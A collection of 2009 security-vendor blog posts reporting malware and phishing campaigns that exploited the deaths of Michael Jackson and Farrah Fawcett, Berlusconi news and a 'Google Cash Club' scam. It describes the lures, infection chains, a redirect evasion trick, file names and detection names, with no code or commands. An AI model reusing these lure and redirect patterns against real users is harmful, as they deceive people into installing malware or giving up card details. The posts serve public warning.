Following the sudden and shocking death of The King of Pop, Senior Threat Researcher Loucif Kharouni reports that a slew of malicious links related to Michael Jackson’s last moments in the hospital before his death are now being proliferated in the wild via the instant messaging (IM) application, MSN. Below is a sample screenshot of an MSN IM window containing various templates of the said malicious links:

When recipients of such messages click on any of these links, they are prompted to save a file named PIC-IMG029-www.hi5.com.exe (with an MD5 checksum of 031429fc14151f94c8651a3fb110c19b), instead of being led to an image site or gallery. Initial analysis shows that the said file is a variant of the SDBOT family.

More updates shortly. Stay tuned.

Update as of 27 June 2009

The botnet is said to push the templated messages through an IRC to the client to be spammed. Below is a sample screenshot of the botnet’s activity:

The malware responsible for this is detected as WORM_IRCBOT.GAT. It opens a certain port on the affected system then listens for remote commands. Kharouni reports that commands to download certain files are received and executed by the affected system, ultimately leading to the download a PUSHDO variant. PUSHDO is a botnet responsible for a huge amount of spam activity. More information on PUSHDO can be found here:

• Pushdo/Cutwail – The Art of Spamming (Part 1 of 5)
  
• Pushdo/Cutwail – From Russia with Love (Part 2 of 5)
  
• Pushdo/Cutwail – Can’t Touch This (Part 3 of 5)
  
• Pushdo/Cutwail – Sniffing for the Win (Part 4 of 5)
  
• Pushdo/Cutwail – Traditional AV is Useless (Part 5 of 5)
  

A whitepaper showing findings by the research of Trend Micro analysts on PUSHDO/CUTWAIL is also available and can be downloaded here.

Trend Micro clients are rest assured that all URLs are already blocked through the Smart Protection Network.

If you're new here, you may want to subscribe to our RSS feed. Thanks for visiting!

Twitter is a very popular platform for expressing whatever is on a user’s mind, making it a favorite target of malware authors. Trend Micro has published several blog entries that discussed attacks on Twitter. Now, the creators of Koobface included a new component in the malware to target the vast number of Twitter users. They’ve come up with the latest update to the Koobface loader binary and other known Koobface components that target social networking sites like Facebook, MySpace, Hi5, Bebo, Tagged, and Netlog.

The new component uses a victim’s Twitter account to post tweets using Internet-browsing cookies to log in to the target user’s account. Tweets can more successfully be posted when the victim is currently logged on to his/her Twitter account as the ‘evil’ Koobface binary runs in the background.

Figure 1. Twitter account of an infected PC

The supossed tweets are retrieved from a Koobface C&C domain and use Tinyurl.com to shorten and kind of obfuscate the URL included in the message.

Figure 2. Network stream of an affected PC

Visiting the posted URL leads to a Koobface redirector page that opens the same old ‘fake’ YouTube page that hosts the Koobface loader posing as an Adobe Flash Player update also known as the infamous setup.exe.

Figure 3. Fake YouTube page that installs setup.exe

As with earlier Koobface-related attacks, however, Trend Micro product users need not worry about being infected as Smart Protection Network already blocks malicious sites and files from running on their systems. They should, however, still keep in mind that an ounce of prevention is always better than a pound of cure.

Related posts on Koobface:

• Koobface Worm Alive and Wriggling
• Koobface Tries Captcha-Breaking
• Bogus Facebook Malware and a Dancing Girl

Twitter, likewise, was never that safe from attacks:

• Another Sex Tape, Another Malware Attack
• Wholsesale Redirects to Malware Averted For Now
• Iran Street Protests Paralleled by DDoS Attacks

Update on June 28:

Setup.exe is now detected as WORM_KOOBFACE.DC. It has the ability to fetch information from the affected PC and to send said info to URLs via HTTP POST.

Moreover, Koobface writers immediately updated their mal-tweets, cleverly using current events related to Michael Jackson’s death. Luckily, the URL included in the message did not change and is still being blocked by Smart Protection Network.

Along with the updated tweets is an update of a Koobface binary (TROJ_KOOBFACE.AJ) targeting Facebook. This binary is already being processed. More details will be provided as analysis progresses.

As the controversy about Italian Prime Minister Silvio Berlusconi rises, spammers take advantage of the news to lure their victims to their malicious plots.

The spammed mail claims to come from YouTube, but checking the domain of the sender reveals that it actually came from youtorube.com, and not from the real youtube.com.

Figure 1. Notice the extra letters in the sender domain

Below is the rough translation of the mail from Italian to English:

Have you seen what combines our Chairman of the Silvio Berlusconi? You have followed your story on escort?
Thanks to a journalist of LAW, we have the opportunity to see our premier while running along with the escort
leaving little in the newspapers .. if you want to see them, and this link: http://you{BLOCKED}e.com/watchv=W3k9pMtrccQ.html
TO VIEW THE VIDEO, AND ‘THE FOLLOWING IS NECESSARY TO INSTALL CODEC

Below is the screenshot of the mail:

Figure 2. Spam sample

To view the said video, user must download and intall a video codec first. Upon clicking the link, it will download a malicious file named wmpcodec.exe. The spam mail is already detected in TMASE Full Pattern 6726, and all URLs are now blocked by Trend Micro. In addition, the malicious file is detected as WORM_KOLAB.DI.

Cybercriminals take the low road once again as they pepper the Internet with blackhat SEO links that are likely to attract users searching for news about the death of Charlie’s Angels star Farrah Fawcett, who, at age 62, finally ended a long struggle with cancer.

Figure 1. Blackhat SEO links for Farrah Fawcett searches sets in

Hosted on is-the-boss domains (last seen in the H1N1 blackhat SEO attack), the links that come up in search results redirect to other URLs that eventually land on all-too-familiar territory: a rogue antivirus download.

In one specific infection chain traced by Research Manager Ivan Macalintal, the initial link redirects to another URL in the same domain, and then redirects another URL that has referrer checks before unfolding its contents. This is an evasion technique used by cybercriminals to avoid analysis by security researchers or being crawled (and rated) by search engines.

Once the requester is cleared, the URL redirects to two more URLs before finally landing on a download page (within a certain thesecuritytools domain–now blocked by Trend Micro). The page downloads install.exe, which is a rogue antivirus detected as TROJ_FAKEAV.BBM.

As this report is being written our engineers are analyzing the behavior of this malware. Trend Micro Smart Protection Network already blocks malicious URLs related to this attack.

Not long after news of Farrah Fawcett’s passing hit mainstream news, singer/entertainer Michael Jackson likewise meets an untimely death. Users are advised to exercise extreme caution in searching for related news and information surrounding the deaths of these celebrities.

One of the more famous blackhat SEO manipulation attack we have documented thus far include the attack that happened shortly after Heath Ledger’s death.

Update (2:30 am (UTC-7)): TROJ_FAKEAV.BBM behaves fairly similarly to other rogue antivirus we’ve seen to date. Here’s a screenshot of its “scanning window”:

Figure 2. The rogue antivirus program’s window

Users who have the misfortune of coming across “System Security Antivirus” are advised to run their legitimate antivirus if this makes an appearance on their system.

We have recently discovered a version, of online fraud that takes the guise of a legitimate-lookng news website. At first glance, the content of the purported news page appears real but after conducting further analysis, one will realize that the news page is actually a spammy site.

What’s supposed to be a news article is actually an writeup that explains how Google can supposedly provide online users the opportunity to earn easy money. To make it more convincing, the page also claims to have several positive responses from anonymous online users. Clicking any of the links from the spam website shown above leads to a phishing page.

The page contains a spoofed countdown timer that hopes to make the user panic and quickly fill up the form. Clicking the See If I Qualify button then directs the user to another page containing an affirmation of the user’s qualifications, which will then require him/her to fill up another form with his/her credit card information.

Related phishing schemes have also been found using the same technique but with different keywords other than Google Cash Club. Below are some of the keywords used:

• Make Money with Google
• Google Money Monster
• Google Home Income
• Easy Google Profit
• Google’s Business Kit

Inquiries on the legitimacy of the service have been posted on Google’s support forum, and we agree with what most of the users have posted: Google Cash Club is a scam.

The phishing URL is already blocked by the Trend Micro Smart Protection Network.